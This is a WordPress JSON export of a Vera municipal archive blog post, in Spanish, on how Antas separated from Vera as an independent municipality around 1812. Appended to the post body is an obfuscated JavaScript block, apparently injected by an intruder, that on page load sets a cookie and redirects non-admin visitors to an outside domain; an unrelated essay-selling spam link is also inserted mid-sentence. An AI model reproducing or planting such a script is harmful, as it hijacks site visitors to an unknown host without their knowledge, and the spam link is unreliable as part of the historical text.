{"id":2930,"date":"2017-10-10T08:33:30","date_gmt":"2017-10-10T08:33:30","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=2930"},"modified":"2019-02-01T07:59:19","modified_gmt":"2019-02-01T07:59:19","slug":"antas-municipio-independiente-a-partir-del-ano-1812","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2017\/10\/10\/antas-municipio-independiente-a-partir-del-ano-1812\/","title":{"rendered":"ANTAS, MUNICIPIO INDEPENDIENTE A PARTIR DEL A\u00d1O 1812"},"content":{"rendered":"<p>Se muestran fragmentos del art\u00edculo de Jos\u00e9 L\u00f3pez Maldonado, experto en Her\u00e1ldica, sobre uno de los municipios hermanos de Vera, Antas, y su formaci\u00f3n como Municipio independiente -hermano por cercan\u00eda, por costumbres, por unirse ante los peligros y por gen\u00e9tica-.<\/p>\n<p><!--more--><\/p>\n<p>Muchos investigadores y curiosos nos preguntan sobre la fecha en la que el Municipio de Antas comenz\u00f3 a ser independiente del de Vera. Siendo conscientes de la existencia del art\u00edculo de Jos\u00e9 L\u00f3pez Maldonado, <a href=\"https:\/\/psychology-essays.com\/\">psychology essay<\/a> publicado en <i>Revista Axarqu\u00eda<\/i> n.\u00ba 13 (a\u00f1o 2008), mostramos algunos fragmentos sobre el mismo, ya que es el que m\u00e1s datos y fuentes aporta, por el momento, recomendando a los lectores la lectura completa del texto.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/07\/portfolio-antas-1910-a.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-2934\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/07\/portfolio-antas-1910-a.jpg\" alt=\"\" width=\"1181\" height=\"891\" \/><\/a><\/p>\n<p>Haciendo memoria de los avatares de los contornos de ese r\u00edo Antas, deber\u00eda saberse que en las inmediaciones del pueblo del Antas actual existi\u00f3 en la Edad del Bronce, y heredera de la cultura de Los Millares, un importante asentamiento poblacional y de los m\u00e1s destacados dentro de la Cultura del Argar, investigada por Luis Siret y por Franz Schubart, que cubri\u00f3 los a\u00f1os de 2200 a 1550 a.C. Desde esa fecha hasta la llegada de los moriscos por su \u201cexpulsi\u00f3n cautelar\u201d de la fortaleza de Vera en 1488 no hay fuentes escritas, epigr\u00e1ficas, ni se\u00f1al del enclave en mapas o descripciones geogr\u00e1ficas romanas o musulmanas sobre Antas, \u201clugar de paso\u201d en lat\u00edn (las actas capitulares de Lorca y de Murcia deber\u00edan haber anotado su existencia, como ocurre con la fortaleza de Vera o con la de Moj\u00e1car). Los arque\u00f3logos s\u00ed han demostrado, por medio de restos de cer\u00e1mica, de hierro, etc., que existieron all\u00ed asentamientos hasta la Edad Media inicial o Alta Edad Media, como ocurre en otros lugares del Levante.<\/p>\n<p>En cualquier caso, y creo que ser\u00eda inteligente y enriquecedor para los intelectuales de cada uno de los pueblos de esta Comarca, basarse en datos reales, tener una visi\u00f3n m\u00e1s amplia de los acontecimientos y argumentar que es evidente que, al igual que la cultura del Argar fue heredera de los Millares, tambi\u00e9n se pueda decir que la Baria y Bayra costera fueran herederas de esos asentamientos post arg\u00e1ricos. Y luego lo ser\u00e1 la Vera del cerro en su nuevo asentamiento fortificado musulm\u00e1n (la Vera vieja), como lo ser\u00eda la nueva Antas respecto de esa Vera cristiana de 1488 (al margen de que, tanto Antas como la Vera Vieja conserven cer\u00e1micas romanas y premusulmanas). Creo que es preferible eso a seguir oyendo <b>disquisiciones top\u00f3latras<\/b> (<i>apego desmedido al terru\u00f1o<\/i>, en palabras de Ortega y Gasset &#8211;<i>La Redenci\u00f3n de las Provincias<\/i>-), para mantener una incomprensible rivalidad y que s\u00f3lo ocasiona minar la concordia y aumentar la desuni\u00f3n entre los buenos vecinos de la comarca del Levante almeriense, uno de los males, como bien dec\u00eda Jos\u00e9 Moreno Jorge, de esta Tierra.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/07\/portfolio-antas-1910-b.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-2935\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/07\/portfolio-antas-1910-b.jpg\" alt=\"\" width=\"1181\" height=\"907\" \/><\/a><\/p>\n<p>Sobre la cuesti\u00f3n de los musulmanes de Antas nos remitimos a los estudios de Carmen Rodr\u00edguez Gertzwitz y a los estudios realizados por Valeriano S\u00e1nchez Ramos. Sobre \u00e9ste \u00faltimo creemos interesante anotar que en una conferencia dada en Vera (convento de la Victoria, junio de 2017), demostr\u00f3 (tras estudiar todas las fuentes documentales posibles), mediante la exposici\u00f3n de un mapa elaborado por \u00e9l sobre los focos de rebeld\u00eda surgidos antes, durante y despu\u00e9s de la Rebeli\u00f3n de las Alpujarras, que en nuestra Comarca <b>no hubo conflictos <\/b><b>de importancia <\/b><b>en la relaci\u00f3n<\/b> entre los cristianos y los moriscos. De hecho, antes de la anunciada llegada de Ab\u00e9n Humeya a Vera para cercarla, todos los moriscos de Antas y otros lugares cercanos entraron con sus ganados en la fortaleza de la Vera Nueva para defenderla junto a los cristianos viejos. Como explicaci\u00f3n a tal fen\u00f3meno, no se me ocurre pensar en otra cosa que en el ambiente apacible que se viv\u00eda en estas tierras antes de la Rebeli\u00f3n, rota final y tristemente con la expulsi\u00f3n definitiva de muchos de esos cristianos nuevos.<\/p>\n<p><i>A partir de esos momentos de repoblaci\u00f3n cristiana, Antas queda constituida como un Lugar o alquer\u00eda de Vera y empieza su largo camino <\/i>(palabras de L\u00f3pez Maldonado). Y la cuesti\u00f3n que nos interesa es saber cu\u00e1ndo se desgaj\u00f3 del Municipio de Vera para ser Municipio independiente.<\/p>\n<p>Jos\u00e9 L\u00f3pez Maldonado a\u00f1ade un p\u00e1rrafo del investigador Juan Grima Cervantes, refiri\u00e9ndose a los vecinos de Antas para explicar la secesi\u00f3n de Vera: <i>que quejosos como estaban los vecinos de los agravios que con ellos comet\u00eda la ciudad de Vera, estos solucionaron su problema en el primer cuarto del siglo XVIII cuando Antas deje de ser un lugar y se independice totalmente de Vera<\/i>.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/07\/portfolio-antas-1910-c.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-2936\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/07\/portfolio-antas-1910-c.jpg\" alt=\"\" width=\"1181\" height=\"1581\" \/><\/a><\/p>\n<p>L\u00f3pez Maldonado no acepta esta explicaci\u00f3n<a class=\"sdendnoteanc\" href=\"#sdendnote1sym\" name=\"sdendnote1anc\"><sup>1<\/sup><\/a> y propone situar esta decisi\u00f3n en el primer tercio del siglo XIX:<\/p>\n<p><span style=\"color: #000000\"><i><b>(\u2026) visto esto, nos podemos imaginar que los vecinos de Antas se acogieron al Decreto CLXIII de 23 de mayo de 1812 sobre la formaci\u00f3n de Ayuntamientos Constitucionales <\/b><\/i><\/span><span style=\"color: #000000\"><i><b>de elecci\u00f3n popular<\/b><\/i><\/span><span style=\"color: #000000\"><i><b>:<\/b><\/i><\/span><\/p>\n<p><span style=\"color: #000000\">\u201c<i><b>La Regencia del Reyno se ha servido dirigirme el decreto que sigue:<\/b><\/i><\/span><\/p>\n<p><span style=\"color: #000000\"><i><b>DON FERNANDO VII por la Gracia de Dios [\u2026] SABED: Que las Cortes han decretado lo siguiente:<\/b><\/i><\/span><\/p>\n<p><span style=\"color: #000000\"><i><b>A las Cortes generales y extraordinarias convencidas que [\u2026] se establezcan Ayuntamientos con la mayor brevedad en aquellos pueblos que no habi\u00e9ndolos tenido hasta aqu\u00ed, conviene que los tengan en adelante [\u2026] decretan:<\/b><\/i><\/span><\/p>\n<p><span style=\"color: #000000\"><i><b>1\u00aa.- Cualquiera pueblo que no tenga ayuntamiento y cuya poblaci\u00f3n considere que debe tener ayuntamiento, lo har\u00e1 presente a la Diputaci\u00f3n de mi almas y que por sus particulares circunstancias de agricultura, industria o Provincia, para que en virtud de su informe se provea lo conveniente por el gobierno.<\/b><\/i><\/span><\/p>\n<p><span style=\"color: #000000\"><i><b>2\u00aa.- [\u2026] y as\u00ed hasta llegar al punto n\u00famero trece, donde concluye este decreto\u201d.<\/b><\/i><\/span><\/p>\n<p><span style=\"color: #000000\"><i><b>A este decreto de las Cortes se debi\u00f3 [de] acoger Antas, para desgajarse y emanciparse de Vera, pero con la llegada del Trienio Liberal, de Riego, las cosas cambian y es entonces, en enero de 1823, cuando Vere hace todo lo posible por volver a mantener su antiguo alfoz y para ello re\u00fane y env\u00eda a la Diputaci\u00f3n Provincial su alegaci\u00f3n de que Antas siempre ha sido una alquer\u00eda de Vera y para ello extrae de su archivo de Reserva el legajo que en 1618 confirma que Vera limita al Oeste con Moj\u00e1car (no existe como municipio Garrucha) y con los Se\u00f1or\u00edos de B\u00e9dar, Sorbas y Lubr\u00edn al Noroeste y Norte respectivamente, y no con Antas, ya que est\u00e1 incluida en su t\u00e9rmino jurisdiccional y parroquial.<\/b><\/i><\/span><\/p>\n<p><span style=\"color: #000000\"><i><b>Debemos suponer, a falta de mayor y mejor informaci\u00f3n y visto que en 1845 ten\u00eda Ayuntamiento propio, que la Diputaci\u00f3n Provincial fall\u00f3 a favor de \u00e9sta o bien porque el trasiego de alegaciones llegasen al t\u00e9rmino del Trienio Liberal y al volver las aguas a su revuelto cauce las alegaciones de Vera quedasen paradas.<\/b><\/i><\/span><\/p>\n<p>Resuelta la duda inicial sobre la fecha aproximada de la creaci\u00f3n del Municipio de Antas es evidente que quedan por responder muchas preguntas, que dejo apartadas hasta oportunidades m\u00e1s propicias, tra\u00eddas, claro est\u00e1 de los propios documentos conservados.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/10\/portada-padr\u00f3n-vecinos-antas-1825-libro-0401-AMV.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3908\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/10\/portada-padr\u00f3n-vecinos-antas-1825-libro-0401-AMV-300x149.jpg\" alt=\"\" width=\"300\" height=\"149\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/10\/portada-padr\u00f3n-vecinos-antas-1825-libro-0401-AMV-300x149.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/10\/portada-padr\u00f3n-vecinos-antas-1825-libro-0401-AMV-768x380.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/10\/portada-padr\u00f3n-vecinos-antas-1825-libro-0401-AMV-1024x507.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/10\/portada-padr\u00f3n-vecinos-antas-1825-libro-0401-AMV.jpg 1616w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Padr\u00f3n de vecinos de Antas del a\u00f1o 1825 conservado en el Archivo Municipal de Vera (libro 401). A disposici\u00f3n de los usuarios en formato pdf en la web: vera.es (archivo municipal).<\/p>\n<hr \/>\n<p>NOTAS<\/p>\n<div id=\"sdendnote1\">\n<p><a class=\"sdendnotesym\" href=\"#sdendnote1anc\" name=\"sdendnote1sym\">1<\/a> Yo tampoco, pues la realidad documental con la que me encuentro todos los d\u00edas en el Archivo Municipal de Vera nos ofrece mucha complejidad (empezando por distinguir, por ejemplo, entre los intereses de las clases populares o las m\u00e1s adineradas), m\u00e1xime cuando, de hecho, la aplicaci\u00f3n de la Justicia se realizaba desde Vera, garante de los derechos de todos los vecinos de su territorio jurisdiccional, al margen de los posibles privilegios de cada clase social, encontradas en cualquier Municipio espa\u00f1ol, dicho sea de paso&#8230;<\/p>\n<p>[Fotograf\u00edas cedidas por Enrique Fern\u00e1ndez Bolea. Portfolio de 1910, aprox.]<\/p>\n<p style=\"text-align: right\">26-07-2017<\/p>\n<p style=\"text-align: right\">Manuel Caparr\u00f3s Perales<\/p>\n<p style=\"text-align: right\">Archivo Municipal de Vera<\/p>\n<\/div>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Se muestran fragmentos del art\u00edculo de Jos\u00e9 L\u00f3pez Maldonado, experto en Her\u00e1ldica, sobre uno de los municipios hermanos de Vera, Antas, y su formaci\u00f3n como Municipio independiente -hermano por cercan\u00eda, por costumbres, por unirse ante los peligros y por gen\u00e9tica-.<\/p>\n","protected":false},"author":7,"featured_media":2933,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[109],"tags":[223,230,221,268,222],"class_list":["post-2930","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-historia","tag-antas","tag-jose-lopez-maldonado","tag-lindes","tag-s-xix","tag-segregacion"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2930","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=2930"}],"version-history":[{"count":9,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2930\/revisions"}],"predecessor-version":[{"id":3910,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2930\/revisions\/3910"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/2933"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=2930"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=2930"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=2930"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}